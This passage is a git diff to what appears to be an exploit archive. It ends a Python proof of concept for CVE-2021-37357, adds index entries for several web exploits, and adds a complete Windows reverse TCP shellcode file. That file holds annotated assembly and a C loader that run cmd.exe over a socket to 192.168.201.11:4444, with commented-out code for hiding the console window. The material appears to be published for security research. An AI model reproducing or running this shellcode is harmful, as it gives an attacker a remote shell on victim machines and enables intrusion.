+ _\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_
+ _\///______________\///////////__\///_____\/////__________\///////\//__
+ '''
+ info = 'CVE-2021-37357 PoC'.center(76)
+ credits = 'Created by @AffineSecurity and @qhum7sec'.center(76)
+ print(f"{art}\n{info}\n{credits}")
+
+def main():
+ logo()
+ hostname = sys.argv[1]
+ username = sys.argv[2]
+ password = sys.argv[3]
+
+ if len(sys.argv) != 4:
+ print("Usage: python3 exploit.py http://127.0.0.1:80 username password")
+
+ exploit(hostname, username, password)
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 1f5bcc305..4c75f74a1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44182,6 +44182,7 @@ id,file,description,date,author,type,platform,port
50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",1970-01-01,"Luca Bernardi",webapps,php,
50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",1970-01-01,"Bryan Leong",webapps,php,
50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Simone Cristofaro",webapps,php,
+50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",1970-01-01,"Metin Yunus Kandemir",webapps,hardware,
50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php,
50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",1970-01-01,nhattruong,webapps,php,
50139,exploits/php/webapps/50139.txt,"WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)",1970-01-01,"Vikas Srivastava",webapps,php,
@@ -44264,9 +44265,11 @@ id,file,description,date,author,type,platform,port
50256,exploits/php/webapps/50256.txt,"WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
50254,exploits/hardware/webapps/50254.txt,"Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure",1970-01-01,icekam,webapps,hardware,
50255,exploits/multiple/webapps/50255.txt,"WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Sentinal920,webapps,multiple,
+50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory Traversal",1970-01-01,"Eric Salario",webapps,php,
50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",1970-01-01,"Allen Enosh Upputori",webapps,php,
50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php,
50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php,
+50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",1970-01-01,a-rey,webapps,php,
50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple,
50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php,
@@ -44308,6 +44311,7 @@ id,file,description,date,author,type,platform,port
50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,V1n1v131r4,webapps,php,
50324,exploits/php/webapps/50324.txt,"WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50325,exploits/php/webapps/50325.html,"WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)",1970-01-01,0xB9,webapps,php,
+50326,exploits/php/webapps/50326.txt,"Budget and Expense Tracker System 1.0 - Arbitrary File Upload",1970-01-01,"()t/\\/\\1",webapps,php,
50327,exploits/php/webapps/50327.txt,"Police Crime Record Management Project 1.0 - Time Based SQLi",1970-01-01,"()t/\\/\\1",webapps,php,
50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",1970-01-01,"Andrei Manole",webapps,aspx,
50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,
@@ -44315,11 +44319,14 @@ id,file,description,date,author,type,platform,port
50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php,
50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware,
50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
+50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware,
+50342,exploits/hardware/webapps/50342.py,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,hardware,
50343,exploits/php/webapps/50343.txt,"WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Nosa Shandy",webapps,php,
50344,exploits/php/webapps/50344.txt,"WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50348,exploits/php/webapps/50348.py,"Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
+50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting",1970-01-01,0xB9,webapps,php,
50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php,
50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php,
50355,exploits/php/webapps/50355.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
@@ -44383,3 +44390,6 @@ id,file,description,date,author,type,platform,port
50437,exploits/windows/webapps/50437.txt,"Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read",1970-01-01,z4nd3r,webapps,windows,
50432,exploits/php/webapps/50432.txt,"Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation",1970-01-01,"Oscar Gil Gutierrez",webapps,php,
50435,exploits/php/webapps/50435.txt,"Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,Ghuliev,webapps,php,
+50438,exploits/java/webapps/50438.txt,"Jetty 9.4.37.v20210219 - Information Disclosure",1970-01-01,"Mayank Deshmukh",webapps,java,
+50439,exploits/php/webapps/50439.py,"Clinic Management System 1.0 - SQL injection to Remote Code Execution",1970-01-01,"Pablo Santiago",webapps,php,
+50440,exploits/php/webapps/50440.txt,"Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)",1970-01-01,"Sam Ferguson",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 3dd8bb7f2..183fffa14 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1025,3 +1025,4 @@ id,file,description,date,author,type,platform
48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86
48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86
+50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
diff --git a/shellcodes/windows_x86-64/50291.c b/shellcodes/windows_x86-64/50291.c
new file mode 100644
index 000000000..16f87a8c9
--- /dev/null
+++ b/shellcodes/windows_x86-64/50291.c
@@ -0,0 +1,290 @@
+# Title: Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
+# Date: 09.12.2021
+# Author: Xenofon Vassilakopoulos
+# Tested on: Windows/x64 - 10.0.19043 N/A Build 19043
+
+/*
+
+MIT License
+
+Copyright (c) 2021 Xenofon Vassilakopoulos
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
+
+
+[BITS 32]
+
+global _start
+
+section .text
+
+_start:
+
+; Locate Kernelbase.dll address
+XOR ECX, ECX ;zero out ECX
+MOV EAX, FS:[ecx + 0x30] ;EAX = PEB
+MOV EAX, [EAX + 0x0c] ;EAX = PEB->Ldr
+MOV ESI, [EAX + 0x14] ;ESI = PEB->Ldr.InMemoryOrderModuleList
+LODSD ;memory address of the second list entry structure
+XCHG EAX, ESI ;EAX = ESI , ESI = EAX
+LODSD ;memory address of the third list entry structure
+XCHG EAX, ESI ;EAX = ESI , ESI = EAX
+LODSD ;memory address of the fourth list entry structure
+MOV EBX, [EAX + 0x10] ;EBX = Base address
+
+; Export Table
+MOV EDX, DWORD [EBX + 0x3C] ;EDX = DOS->e_lfanew
+ADD EDX, EBX ;EDX = PE Header
+MOV EDX, DWORD [EDX + 0x78] ;EDX = Offset export table
+ADD EDX, EBX ;EDX = Export table
+MOV ESI, DWORD [EDX + 0x20] ;ESI = Offset names table
+ADD ESI, EBX ;ESI = Names table
+XOR ECX, ECX ;EXC = 0
+
+GetFunction :
+
+INC ECX; increment counter
+LODSD ;Get name offset
+ADD EAX, EBX ;Get function name
+CMP dword [EAX], 0x50746547 ;"PteG"
+JNZ SHORT GetFunction ;jump to GetFunction label if not "GetP"
+CMP dword [EAX + 0x4], 0x41636F72 ;"rocA"
+JNZ SHORT GetFunction ;jump to GetFunction label if not "rocA"
+CMP dword [EAX + 0x8], 0x65726464 ;"ddre"
+JNZ SHORT GetFunction ;jump to GetFunction label if not "ddre"
+
+MOV ESI, DWORD [EDX + 0x24] ;ESI = Offset ordinals
+ADD ESI, EBX ;ESI = Ordinals table
+MOV CX, WORD [ESI + ECX * 2] ;CX = Number of function
+DEC ECX ;Decrement the ordinal
+MOV ESI, DWORD [EDX + 0x1C] ;ESI = Offset address table
+ADD ESI, EBX ;ESI = Address table
+MOV EDX, DWORD [ESI + ECX * 4] ;EDX = Pointer(offset)
+ADD EDX, EBX ;EDX = GetProcAddress
+
+; Get the Address of LoadLibraryA function
+XOR ECX, ECX ;ECX = 0
+PUSH EBX ;Kernel32 base address
+PUSH EDX ;GetProcAddress
+PUSH ECX ;0
+PUSH 0x41797261 ;"Ayra"
+PUSH 0x7262694C ;"rbiL"
+PUSH 0x64616F4C ;"daoL"
+PUSH ESP ;"LoadLibrary"
+PUSH EBX ;Kernel32 base address
+MOV ESI, EBX ;save the kernel32 address in esi for later
+CALL EDX ;GetProcAddress(LoadLibraryA)
+
+ADD ESP, 0xC ;pop "LoadLibraryA"
+POP EDX ;EDX = 0
+PUSH EAX ;EAX = LoadLibraryA
+PUSH EDX ;ECX = 0
+MOV DX, 0x6C6C ;"ll"
+PUSH EDX
+PUSH 0x642E3233 ;"d.23"
+PUSH 0x5F327377 ;"_2sw"
+PUSH ESP ;"ws2_32.dll"
+CALL EAX ;LoadLibrary("ws2_32.dll")
+
+ADD ESP, 0x10 ;Clean stack
+MOV EDX, [ESP + 0x4] ;EDX = GetProcAddress
+PUSH 0x61617075 ;"aapu"
+SUB word [ESP + 0x2], 0x6161 ;"pu" (remove "aa")
+PUSH 0x74726174 ;"trat"
+PUSH 0x53415357 ;"SASW"
+PUSH ESP ;"WSAStartup"
+PUSH EAX ;ws2_32.dll address
+MOV EDI, EAX ;save ws2_32.dll to use it later
+CALL EDX ;GetProcAddress(WSAStartup)
+
+; Call WSAStartUp
+XOR EBX, EBX ;zero out ebx register
+MOV BX, 0x0190 ;EAX = sizeof(struct WSAData)
+SUB ESP, EBX ;allocate space for the WSAData structure
+PUSH ESP ;push a pointer to WSAData structure
+PUSH EBX ;Push EBX as wVersionRequested
+CALL EAX ;Call WSAStartUp
+
+;Find the address of WSASocketA
+ADD ESP, 0x10 ;Align the stack
+XOR EBX, EBX ;zero out the EBX register
+ADD BL, 0x4 ;add 0x4 at the lower register BL
+IMUL EBX, 0x64 ;EBX = 0x190
+MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
+PUSH 0x61614174 ;"aaAt"
+SUB word [ESP + 0x2], 0x6161 ;"At" (remove "aa")
+PUSH 0x656b636f ;"ekco"
+PUSH 0x53415357 ;"SASW"
+PUSH ESP ;"WSASocketA", GetProcAddress 2nd argument
+MOV EAX, EDI ;EAX now holds the ws2_32.dll address
+PUSH EAX ;push the first argument of GetProcAddress
+CALL EDX ;call GetProcAddress
+PUSH EDI ;save the ws2_32.dll address to use it later
+
+;call WSASocketA
+XOR ECX, ECX ;zero out ECX register
+PUSH EDX ;null value for dwFlags argument
+PUSH EDX ;zero value since we dont have an existing socket group
+PUSH EDX ;null value for lpProtocolInfo
+MOV DL, 0x6 ;IPPROTO_TCP
+PUSH EDX ;set the protocol argument
+INC ECX ;SOCK_STREAM(TCP)
+PUSH ECX ;set the type argument
+INC ECX ;AF_INET(IPv4)
+PUSH ECX ;set the ddress family specification argument
+CALL EAX ;call WSASocketA
+XCHG EAX, ECX ;save the socket returned from WSASocketA at EAX to ECX in order to use it later
+
+;Find the address of connect
+POP EDI ;load previously saved ws2_32.dll address to ECX
+ADD ESP, 0x10 ;Align stack
+XOR EBX, EBX ;zero out EBX
+ADD BL, 0x4 ;add 0x4 to lower register BL
+IMUL EBX, 0x63 ;EBX = 0x18c
+MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
+PUSH 0x61746365 ;"atce"
+SUB word [ESP + 0x3], 0x61 ;"tce" (remove "a")
+PUSH 0x6e6e6f63 ;"nnoc"
+PUSH ESP ;"connect", second argument of GetProcAddress
+PUSH EDI ;ws32_2.dll address, first argument of GetProcAddress
+XCHG ECX, EBP
+CALL EDX ;call GetProcAddress
+
+;call connect
+PUSH 0x0bc9a8c0 ;sin_addr set to 192.168.201.11
+PUSH word 0x5c11 ;port = 4444
+XOR EBX, EBX ;zero out EBX
+add BL, 0x2 ;TCP protocol
+PUSH word BX ;push the protocol value on the stack
+MOV EDX, ESP ;pointer to sockaddr structure (IP,Port,Protocol)
+PUSH byte 16 ;the size of sockaddr - 3rd argument of connect
+PUSH EDX ;push the sockaddr - 2nd argument of connect
+PUSH EBP ;socket descriptor = 64 - 1st argument of connect
+XCHG EBP, EDI
+CALL EAX ;execute connect;
+
+;Find the address of CreateProcessA
+ADD ESP, 0x14 ;Clean stack
+XOR EBX, EBX ;zero out EBX
+ADD BL, 0x4 ;add 0x4 to lower register BL
+IMUL EBX, 0x62 ;EBX = 0x194
+MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
+PUSH 0x61614173 ;"aaAs"
+SUB dword [ESP + 0x2], 0x6161 ;"As"
+PUSH 0x7365636f ;"seco"
+PUSH 0x72506574 ;"rPet"
+PUSH 0x61657243 ;"aerC"
+PUSH ESP ;"CreateProcessA" - 2nd argument of GetProcAddress
+MOV EBP, ESI ;move the kernel32.dll to EBP
+PUSH EBP ;kernel32.dll address - 1st argument of GetProcAddress
+CALL EDX ;execute GetProcAddress
+PUSH EAX ;address of CreateProcessA
+LEA EBP, [EAX] ;EBP now points to the address of CreateProcessA
+
+;call CreateProcessA
+PUSH 0x61646d63 ;"admc"
+SUB word [ESP + 0x3], 0x61 ;"dmc" ( remove a)
+MOV ECX, ESP ;ecx now points to "cmd" string
+XOR EDX, EDX ;zero out EDX
+SUB ESP, 16
+MOV EBX, esp ;pointer for ProcessInfo
+
+;STARTUPINFOA struct
+PUSH EDI ;hStdError => saved socket
+PUSH EDI ;hStdOutput => saved socket
+PUSH EDI ;hStdInput => saved socket
+PUSH EDX ;lpReserved2 => NULL
+PUSH EDX ;cbReserved2 => NULL
+XOR EAX, EAX ;zero out EAX register
+INC EAX ;EAX => 0x00000001
+ROL EAX, 8 ;EAX => 0x00000100
+PUSH EAX ;dwFlags => STARTF_USESTDHANDLES 0x00000100
+PUSH EDX ;dwFillAttribute => NULL
+PUSH EDX ;dwYCountChars => NULL
+PUSH EDX ;dwXCountChars => NULL
+PUSH EDX ;dwYSize => NULL
+PUSH EDX ;dwXSize => NULL
+PUSH EDX ;dwY => NULL
+PUSH EDX ;dwX => NULL
+PUSH EDX ;pTitle => NULL
+PUSH EDX ;pDesktop => NULL
+PUSH EDX ;pReserved => NULL
+XOR EAX, EAX ;zero out EAX
+ADD AL, 44 ;cb => 0x44 (size of struct)
+PUSH EAX ;eax points to STARTUPINFOA
+
+;ProcessInfo struct
+MOV EAX, ESP ;pStartupInfo
+PUSH EBX ;pProcessInfo
+PUSH EAX ;pStartupInfo
+PUSH EDX ;CurrentDirectory => NULL
+PUSH EDX ;pEnvironment => NULL
+PUSH EDX ;CreationFlags => 0
+XOR EAX, EAX ;zero out EAX register
+INC EAX ;EAX => 0x00000001
+PUSH EAX ;InheritHandles => TRUE => 1
+PUSH EDX ;pThreadAttributes => NULL
+PUSH EDX ;pProcessAttributes => NULL
+PUSH ECX ;pCommandLine => pointer to "cmd"
+PUSH EDX ;ApplicationName => NULL
+CALL EBP ;execute CreateProcessA
+
+*/
+
+#include <windows.h>
+#include <iostream>
+#include <stdlib.h>
+
+char code[] =
+"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b"
+"\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31"
+"\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f"
+"\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde"
+"\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53"
+"\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54"
+"\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33"
+"\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04"
+"\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68"
+"\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc"
+"\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c"
+"\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68"
+"\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06"
+"\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b"
+"\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63"
+"\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c"
+"\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83"
+"\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61"
+"\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72"
+"\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64"
+"\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57"
+"\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52"
+"\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50"
+"\x52\x52\x51\x52\xff\xd5";
+
+int main(int argc, char** argv)
+{
+ //HWND hWnd = GetConsoleWindow();
+ //ShowWindow(hWnd, SW_HIDE);
+ printf("Shellcode Length: %d\n", strlen(code));
+ void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(exec, code, sizeof(code));
+ ((void(*)())exec)();
+
+ return 0;
+}
\ No newline at end of file